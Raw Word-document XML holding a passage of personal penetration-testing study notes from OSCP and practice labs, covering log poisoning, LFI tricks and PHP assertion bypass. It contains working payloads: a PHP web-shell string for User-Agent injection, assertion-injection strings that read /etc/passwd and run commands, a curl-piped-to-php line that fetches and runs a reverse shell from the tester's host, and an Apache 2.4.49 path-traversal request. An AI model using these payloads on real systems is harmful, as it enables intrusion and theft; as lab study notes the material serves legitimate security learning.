        <w:t xml:space="preserve">Exploitation Tip for Logs/Configs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a file contains credentials or tokens, extract and use them for login, lateral movement, or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's a log file, log poisoning (injecting &lt;?php system($_GET['cmd']); ?&gt; via User-Agent or other headers) then including that file can yield RCE if PHP interprets it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="840"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Windows unattended install files, grep for password, Administrator, or autoLogon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_65o02y40xbtm" w:id="236"/>
      <w:bookmarkEnd w:id="236"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI Tricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try bypassing the PHP assertions (look below for tips)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try null terminating it with Null byte at the end. Just add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> %00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes in older PHP, they will append extensions like .php to the end, and so adding this will terminate the string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try Encoding (look below for tips)</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g9jdh9t8iq7w" w:id="237"/>
      <w:bookmarkEnd w:id="237"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing PHP Assertions</w:t>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId568">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Assertion101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, as you can guess from the name of the box, it has to do with PHP Assertions.</w:t>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t xml:space="preserve">We had potential LFI, but every time we try adding the string "</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t xml:space="preserve"> (like when we do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../ for LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we got a page that said "Not so easy brother!". This was a hint (as well as the name of the box) that the page was using PHP Assertions to check for the "..". And also, the page was in PHP, so that's a hint too.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, to bypass PHP Assertions, we can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId569">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and more specifically, the walkthrough) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and execute commands using this. Here are some examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show_source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">('/etc/passwd')) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show_source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is like "cat", so it's used to read files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">("whoami")) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "system" function is used to execute commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So to get a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host a reverse shell on your local machine via Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the LFI (replace IP first): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(system("curl http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.119:8000/shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | php")) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The syntax "| php" pipes the curl to PHP, so the PHP interpreter will run the curl command, activating the reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C96">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n5qhz5b4ix3b" w:id="238"/>
      <w:bookmarkEnd w:id="238"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C97">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_egm9gxdaxyi8" w:id="239"/>
      <w:bookmarkEnd w:id="239"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack (as taught in OSCP section below) was used on .245 in Relia Challenge Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, in the reading they didn't teach us to use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--path-as-is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag which was necessary for me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --path-as-is "http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always include the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's important to use curl and not firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --path-as-is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CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The --path-as-is flag tells curl not to normalize or decode the URL path before sending.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not get decoded to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1351"/>
